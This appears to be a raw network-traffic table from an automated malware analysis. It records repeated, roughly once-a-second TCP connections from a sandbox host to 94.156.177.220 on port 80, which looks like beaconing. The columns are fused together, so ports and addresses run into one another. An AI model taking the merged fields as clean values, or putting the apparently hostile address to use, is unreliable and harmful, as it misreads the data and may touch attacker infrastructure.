                                  Oct 25, 2024 10:20:14.406076908 CEST4973980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:14.578198910 CEST4974080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:14.584299088 CEST804974094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:14.584453106 CEST4974080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:14.587332964 CEST4974080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:14.592967987 CEST804974094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:14.593029022 CEST4974080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:14.600707054 CEST804974094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:15.567843914 CEST804974094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:15.568039894 CEST4974080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:15.575284958 CEST804974094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:15.575661898 CEST4974080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:15.738233089 CEST4974180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:15.743937969 CEST804974194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:15.744045019 CEST4974180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:15.746071100 CEST4974180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:15.751538992 CEST804974194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:15.751616955 CEST4974180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:15.757064104 CEST804974194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:16.716876984 CEST804974194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:16.716990948 CEST4974180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:16.722909927 CEST804974194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:16.722975969 CEST4974180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:16.859481096 CEST4974480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:16.865134954 CEST804974494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:16.865231991 CEST4974480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:16.867280006 CEST4974480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:16.872728109 CEST804974494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:16.872788906 CEST4974480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:16.878238916 CEST804974494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:17.832015991 CEST804974494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:17.832439899 CEST4974480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:17.838629007 CEST804974494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:17.838702917 CEST4974480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:18.176420927 CEST4974780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:18.181806087 CEST804974794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:18.181890011 CEST4974780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:18.199476957 CEST4974780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:18.204986095 CEST804974794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:18.205156088 CEST4974780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:18.210448980 CEST804974794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:19.151099920 CEST804974794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:19.151355028 CEST4974780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:19.157444000 CEST804974794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:19.157531023 CEST4974780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:19.295753002 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:19.301381111 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:19.301480055 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:19.303529024 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:19.310348988 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:19.310463905 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:19.318404913 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.110606909 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.110799074 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.112565994 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.112579107 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.112629890 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.113428116 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.113507986 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.250371933 CEST4975180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.363428116 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.363555908 CEST4974980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.370598078 CEST804974994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.372490883 CEST804975194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.372589111 CEST4975180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.374851942 CEST4975180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.380268097 CEST804975194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:21.380407095 CEST4975180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:21.385782957 CEST804975194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:22.348746061 CEST804975194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:22.349091053 CEST4975180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:22.355060101 CEST804975194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:22.355151892 CEST4975180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:22.535537004 CEST4975280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:22.541099072 CEST804975294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:22.541291952 CEST4975280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:22.543530941 CEST4975280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:22.549330950 CEST804975294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:22.549457073 CEST4975280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:22.558542967 CEST804975294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:23.506381989 CEST804975294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:23.513082027 CEST4975280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:23.520664930 CEST804975294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:23.520863056 CEST4975280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:23.669429064 CEST4975380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:23.674985886 CEST804975394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:23.675244093 CEST4975380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:23.678324938 CEST4975380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:23.683993101 CEST804975394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:23.684072971 CEST4975380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:23.689537048 CEST804975394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:24.651226044 CEST804975394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:24.651338100 CEST4975380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:24.657496929 CEST804975394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:24.657556057 CEST4975380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:24.803309917 CEST4975480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:24.808927059 CEST804975494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:24.809022903 CEST4975480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:24.811218977 CEST4975480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:24.816596031 CEST804975494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:24.816659927 CEST4975480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:24.822199106 CEST804975494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:25.785826921 CEST804975494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:25.786050081 CEST4975480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:25.792078972 CEST804975494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:25.792182922 CEST4975480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:25.951618910 CEST4975580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:25.957355976 CEST804975594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:25.957529068 CEST4975580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:25.959554911 CEST4975580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:25.965070009 CEST804975594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:25.965151072 CEST4975580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:25.971002102 CEST804975594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:26.942964077 CEST804975594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:26.954108000 CEST4975580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:26.959979057 CEST804975594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:26.960083961 CEST4975580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:27.513991117 CEST4975680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:27.710156918 CEST804975694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:27.710342884 CEST4975680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:27.712598085 CEST4975680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:27.717895031 CEST804975694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:27.717962980 CEST4975680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:27.723520994 CEST804975694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:28.695118904 CEST804975694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:28.695329905 CEST4975680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:28.701324940 CEST804975694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:28.701385975 CEST4975680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:28.847047091 CEST4975780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:29.852535009 CEST804975794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:29.852850914 CEST4975780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:29.857386112 CEST4975780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:29.863399029 CEST804975794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:29.863609076 CEST4975780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:29.869060040 CEST804975794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:30.839289904 CEST804975794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:30.839601040 CEST4975780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:30.845453978 CEST804975794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:30.845530033 CEST4975780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:30.982709885 CEST4975880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:30.988785982 CEST804975894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:30.988944054 CEST4975880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:30.991204977 CEST4975880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:30.997298956 CEST804975894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:30.997406006 CEST4975880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:31.004072905 CEST804975894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:32.009637117 CEST804975894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:32.009820938 CEST4975880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:32.016206980 CEST804975894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:32.016299963 CEST4975880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:32.161623001 CEST4975980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:32.167093992 CEST804975994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:32.167236090 CEST4975980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:32.170057058 CEST4975980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:32.176238060 CEST804975994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:32.176321983 CEST4975980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:32.182918072 CEST804975994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:33.137624025 CEST804975994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:33.139480114 CEST4975980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:33.145709038 CEST804975994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:33.145797014 CEST4975980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:33.674559116 CEST4976080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:33.680007935 CEST804976094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:33.680114985 CEST4976080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:33.682240009 CEST4976080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:33.687712908 CEST804976094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:33.687798977 CEST4976080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:33.693196058 CEST804976094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:34.643838882 CEST804976094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:34.649765968 CEST4976080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:34.655827045 CEST804976094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:34.655885935 CEST4976080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:34.796428919 CEST4976180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:34.802263975 CEST804976194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:34.802380085 CEST4976180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:34.804533958 CEST4976180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:34.810173988 CEST804976194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:34.810261011 CEST4976180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:34.815723896 CEST804976194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:35.764405012 CEST804976194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:35.764612913 CEST4976180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:35.772022009 CEST804976194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:35.772129059 CEST4976180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:35.903042078 CEST4976280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:35.908668041 CEST804976294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:35.908893108 CEST4976280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:35.911026955 CEST4976280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:35.916702986 CEST804976294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:35.916781902 CEST4976280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:35.922312021 CEST804976294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:36.884356022 CEST804976294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:36.884486914 CEST4976280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:36.891187906 CEST804976294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:36.891268969 CEST4976280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:37.032784939 CEST4976380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:37.038342953 CEST804976394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:37.038460970 CEST4976380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:37.040622950 CEST4976380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:37.046211958 CEST804976394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:37.046303034 CEST4976380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:37.051732063 CEST804976394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:38.036004066 CEST804976394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:38.036103010 CEST4976380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:38.041870117 CEST804976394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:38.041938066 CEST4976380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:38.187341928 CEST4976480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:38.192893982 CEST804976494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:38.193017006 CEST4976480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:38.195120096 CEST4976480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:38.200429916 CEST804976494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:38.200499058 CEST4976480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:38.207500935 CEST804976494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:39.179270029 CEST804976494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:39.182220936 CEST4976480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:39.188081980 CEST804976494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:39.188141108 CEST4976480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:39.808393955 CEST4976580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:39.814313889 CEST804976594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:39.814440966 CEST4976580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:39.816567898 CEST4976580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:39.822135925 CEST804976594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:39.822242975 CEST4976580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:39.828455925 CEST804976594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:40.795761108 CEST804976594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:40.795929909 CEST4976580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:40.802577019 CEST804976594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:40.802664042 CEST4976580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:40.937027931 CEST4976680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:40.942778111 CEST804976694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:40.943032980 CEST4976680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:40.945086002 CEST4976680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:40.950526953 CEST804976694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:40.950582981 CEST4976680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:40.956342936 CEST804976694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:42.075862885 CEST804976694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:42.080956936 CEST4976680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:42.081150055 CEST804976694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:42.081222057 CEST4976680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:42.086685896 CEST804976694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:42.419420958 CEST4976780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:42.425354958 CEST804976794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:42.425493002 CEST4976780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:42.429171085 CEST4976780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:42.434514046 CEST804976794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:42.434571028 CEST4976780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:42.440943956 CEST804976794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:43.413599014 CEST804976794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:43.413726091 CEST4976780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:43.419600010 CEST804976794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:43.419670105 CEST4976780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:43.561995983 CEST4976880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:43.567883015 CEST804976894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:43.568114042 CEST4976880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:43.570328951 CEST4976880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:43.575947046 CEST804976894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:43.576011896 CEST4976880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:43.581423044 CEST804976894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:44.566714048 CEST804976894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:44.566821098 CEST4976880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:44.573606968 CEST804976894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:44.573669910 CEST4976880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:44.734644890 CEST4976980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:44.741476059 CEST804976994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:44.741709948 CEST4976980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:44.747003078 CEST4976980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:44.753571033 CEST804976994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:44.753726006 CEST4976980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:44.759124994 CEST804976994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:45.718827009 CEST804976994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:45.730458021 CEST4976980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:45.953665972 CEST4977080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:45.954001904 CEST804976994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:45.954097033 CEST4976980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:45.954134941 CEST804976994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:45.954185009 CEST4976980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:45.955579042 CEST804976994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:45.959616899 CEST804977094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:45.959847927 CEST4977080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:45.962044954 CEST4977080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:45.967685938 CEST804977094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:45.967782974 CEST4977080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:45.973774910 CEST804977094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:46.934838057 CEST804977094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:46.935091972 CEST4977080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:46.940954924 CEST804977094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:46.941023111 CEST4977080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:47.076201916 CEST4977180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:47.082467079 CEST804977194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:47.082580090 CEST4977180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:47.084693909 CEST4977180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:47.090531111 CEST804977194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:47.090625048 CEST4977180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:47.096118927 CEST804977194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:48.041701078 CEST804977194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:48.041945934 CEST4977180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:48.048667908 CEST804977194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:48.048774958 CEST4977180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:48.325642109 CEST4977280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:48.331231117 CEST804977294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:48.331362009 CEST4977280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:48.360626936 CEST4977280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:48.628634930 CEST804977294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:48.628753901 CEST4977280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:48.634532928 CEST804977294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:49.291296959 CEST804977294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:49.291568041 CEST4977280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:49.297261953 CEST804977294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:49.297353983 CEST4977280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:49.437522888 CEST4977380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:49.443141937 CEST804977394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:49.443221092 CEST4977380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:49.445259094 CEST4977380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:49.450798988 CEST804977394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:49.450869083 CEST4977380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:49.456345081 CEST804977394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:50.444104910 CEST804977394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:50.444267035 CEST4977380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:50.450429916 CEST804977394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:50.450546980 CEST4977380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:50.619322062 CEST4977480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:50.624912977 CEST804977494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:50.625000954 CEST4977480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:50.627054930 CEST4977480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:50.632441044 CEST804977494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:50.632515907 CEST4977480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:50.637970924 CEST804977494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:51.601859093 CEST804977494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:51.603399992 CEST4977480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:51.609517097 CEST804977494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:51.609622955 CEST4977480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:52.015682936 CEST4977580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:52.021224022 CEST804977594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:52.021349907 CEST4977580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:52.023469925 CEST4977580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:52.029030085 CEST804977594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:52.029076099 CEST4977580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:52.034579992 CEST804977594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:53.016560078 CEST804977594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:53.016671896 CEST4977580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:53.022732973 CEST804977594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:53.022808075 CEST4977580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:53.154604912 CEST4977680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:53.160204887 CEST804977694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:53.160307884 CEST4977680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:53.162477970 CEST4977680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:53.168273926 CEST804977694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:53.168380022 CEST4977680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:53.174129963 CEST804977694.156.177.220192.168.2.4
